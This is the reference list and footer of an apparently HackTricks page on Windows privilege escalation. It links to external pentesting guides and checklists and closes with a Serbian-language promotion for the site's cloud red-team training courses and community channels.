- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html\
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md\
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\
- https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md\
- https://github.com/frizb/Windows-Privilege-Escalation\
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\
- https://github.com/frizb/Windows-Privilege-Escalation\
- http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html\
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections
{% hint style="success" %}
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podrška HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.